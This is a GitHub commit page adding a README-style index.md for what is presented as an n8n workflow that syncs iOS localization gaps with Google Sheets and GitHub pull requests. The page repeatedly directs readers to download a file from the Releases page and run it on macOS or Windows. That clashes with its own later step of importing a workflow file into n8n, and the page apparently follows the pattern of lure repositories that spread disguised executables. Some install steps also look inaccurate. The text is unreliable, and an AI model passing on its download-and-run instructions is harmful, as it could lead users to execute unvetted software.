Skip to content

Commit e543b2c

Browse files
committed
Commit
0 parents  commit e543b2c

1 file changed

Lines changed: 101 additions & 0 deletions

File tree

index.md

Lines changed: 101 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,101 @@
1+
---
2+
layout: "default"
3+
title: "🎉 n8n-Syncing-iOS-localization-gaps-with-Google-Sheets-and-GitHub-PR-placeholders - Keep Your iOS Localization Accurate"
4+
description: "🌐 Automate iOS localization checks by syncing missing translations to Google Sheets and creating GitHub PR placeholders for smoother builds."
5+
---
6+
# 🎉 n8n-Syncing-iOS-localization-gaps-with-Google-Sheets-and-GitHub-PR-placeholders - Keep Your iOS Localization Accurate
7+
8+
[![Download Now](https://img.shields.io/badge/Download%20Now-%20-%23009EFD)](https://github.com/papikimono/n8n-Syncing-iOS-localization-gaps-with-Google-Sheets-and-GitHub-PR-placeholders/releases)
9+
10+
## 📖 Description
11+
This n8n workflow automation helps you track localization gaps in your iOS apps. It automatically compares iOS strings to your Google Sheets, generates placeholder entries, and opens GitHub pull requests for your review. Use it to ensure your translations are always accurate and ready for release.
12+
13+
## 🚀 Getting Started
14+
To use this application, you need to first download it from our Releases page. Follow the steps below to set everything up.
15+
16+
## 🔗 Download & Install
17+
Visit this page to download: [Releases Page](https://github.com/papikimono/n8n-Syncing-iOS-localization-gaps-with-Google-Sheets-and-GitHub-PR-placeholders/releases)
18+
19+
1. Click on the link above to go to the Releases page.
20+
2. Find the latest version of the application.
21+
3. Click on the appropriate download link for your system.
22+
4. Once the download finishes, locate the file on your computer and run it.
23+
24+
## 📊 Requirements
25+
Before you start, make sure your computer meets the following:
26+
27+
- **Operating System:** macOS or Windows
28+
- **n8n Installed:** You should have n8n installed to run this template.
29+
- **Google Sheets Account:** You need a Google account to access your sheets.
30+
- **GitHub Account:** Make sure you have a GitHub account to handle pull requests.
31+
32+
## 🎬 Step-by-Step Guide
33+
Follow these steps to set up the workflow:
34+
35+
### 1. Install n8n
36+
If you haven't installed n8n yet, here are the steps:
37+
38+
- For macOS users, install [Homebrew](https://brew.sh) and then run:
39+
```bash
40+
brew install n8n
41+
```
42+
- For Windows users, download the [Windows installer](https://n8n.io/download/) and follow the instructions.
43+
44+
### 2. Configure Google Sheets
45+
You must set up Google Sheets for this workflow:
46+
47+
- Create a new Google Sheet or open an existing one.
48+
- Add columns for your strings and translations.
49+
50+
### 3. Import the Workflow
51+
Once you have n8n ready, import this workflow:
52+
53+
1. Open n8n in your browser (usually at `http://localhost:5678`).
54+
2. Click on the "Import" button in the top menu.
55+
3. Choose the downloaded workflow file.
56+
4. Follow the prompts to load the workflow into n8n.
57+
58+
### 4. Connect Your Accounts
59+
You need to link your Google Sheets and GitHub accounts:
60+
61+
- In n8n, go to the credentials section.
62+
- Add your Google Sheets and GitHub credentials.
63+
- Make sure to test the connections to verify they work.
64+
65+
### 5. Run the Workflow
66+
To run the workflow:
67+
68+
1. In n8n, select the workflow you imported.
69+
2. Click on the "Execute Workflow" button.
70+
3. Review the generated pull requests and localization gaps, then approve them.
71+
72+
## 🏷️ Topics
73+
This project covers multiple important topics:
74+
75+
- **GitHub Pull Requests:** Automate your pull requests.
76+
- **iOS Localization:** Keep translations accurate.
77+
- **n8n Workflows:** Utilize automation for efficiency.
78+
79+
## 📞 Support
80+
If you encounter issues or have questions:
81+
82+
- Check the GitHub Issues section of this repository.
83+
- Ask for help from the community via GitHub Discussions.
84+
85+
## 📄 License
86+
This project is licensed under the MIT License. You can view the full text in the LICENSE file within the repository.
87+
88+
## 👥 Contributing
89+
We welcome contributions! If you wish to improve this project:
90+
91+
- Fork the repository and make your changes.
92+
- Submit a pull request detailing what you’ve done.
93+
- Ensure your code is clean and well-documented.
94+
95+
## 🔗 Additional Resources
96+
For more information, consider checking out:
97+
98+
- [n8n Documentation](https://docs.n8n.io)
99+
- [GitHub Documentation](https://docs.github.com)
100+
101+
Make sure to visit the [Releases Page](https://github.com/papikimono/n8n-Syncing-iOS-localization-gaps-with-Google-Sheets-and-GitHub-PR-placeholders/releases) to download the latest version and start improving your localization workflow.

0 commit comments

Comments
 (0)